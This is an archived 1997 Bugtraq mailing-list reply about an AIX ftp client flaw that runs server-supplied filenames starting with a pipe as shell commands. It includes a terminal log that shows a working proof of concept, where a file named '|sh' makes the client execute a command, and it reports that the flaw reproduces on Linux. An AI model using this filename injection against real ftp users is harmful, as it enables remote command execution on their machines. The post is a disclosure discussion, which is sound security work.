Bugtraq mailing list archives
Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client
From: af () C4C COM (af () C4C COM)
Date: Mon, 3 Nov 1997 10:03:52 -0700
ers () VNET IBM COM wrote:VULNERABILITY: The AIX ftp client interprets server provided filenames I. Description The ftp client can be tricked into running arbitrary commands supplied by the remote server. When the remote file begins with a pipe symbol, the ftp client will process the contents of the remote file as a shell script.On two machines running AIX 3.2.5 I've tested it, but instead of executing the remote file, it searches for a local file with the same name as the remote file and executes it with normal user priviledges instead of root privilegdes.
Yes, but try "|sh" instead. I've included a log of what happens.
BTW, I believe that this also happens on HP-UX 9.05
It works on our Linux slackware as well. I suspect most ftp clients are susceptible to this "problem." $ id uid=100(guest) gid=100(usr) $ pwd /tmp/ftp-test $ echo "id > /tmp/OUT" > "|sh" $ ls -la total 24 drwxr-xr-x 2 guest usr 512 Nov 3 09:45 . drwxrwxrwt 6 bin bin 1024 Nov 3 09:44 .. -rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh $ ftp localhost Connected to localhost. ....snip.... 230 User guest logged in. ftp> cd /tmp/ftp-test ftp> ls -l total 24 -rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh ftp> mget * mget |sh? y 150 Opening data connection for |sh (14 bytes). 15 bytes received in 0.2187 seconds (0.06699 Kbytes/s) local: |sh remote: |sh ftp> quit $ ls -l /tmp/OUT -rw-r--r-- 1 guest usr 28 Nov 3 09:45 /tmp/OUT $ cat /tmp/OUT uid=100(guest) gid=100(usr) $ I also wonder about IBM's answer: SOLUTION: Remove the setuid bit from the "ftp" command. On our 4.2.1, ftp will not run if it is not suid. Didn't somebody test this? Andrew Green af () c4c com
Current thread:
- Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client af () C4C COM (Nov 03)
- <Possible follow-ups>
- Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client Lutz Donnerhacke (Nov 04)
- netapp NFS server crash by FreeBSD client [w/patch] Dmitry Kohmanyuk Дмитрий Кохманюк (Nov 05)
- simptcp hotfix renewed on 03/11/1997 Yves Kreis (Nov 05)
- Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client Wolfgang Ley (Nov 06)
- HPSBUX9710-072 Sec. Vulnerability in CDE on HP-UX 10.[10, 20, Aleph One (Nov 06)
- Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client Troy A. Bollinger (Nov 06)
- Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client Giulio E. D. Botto (Nov 04)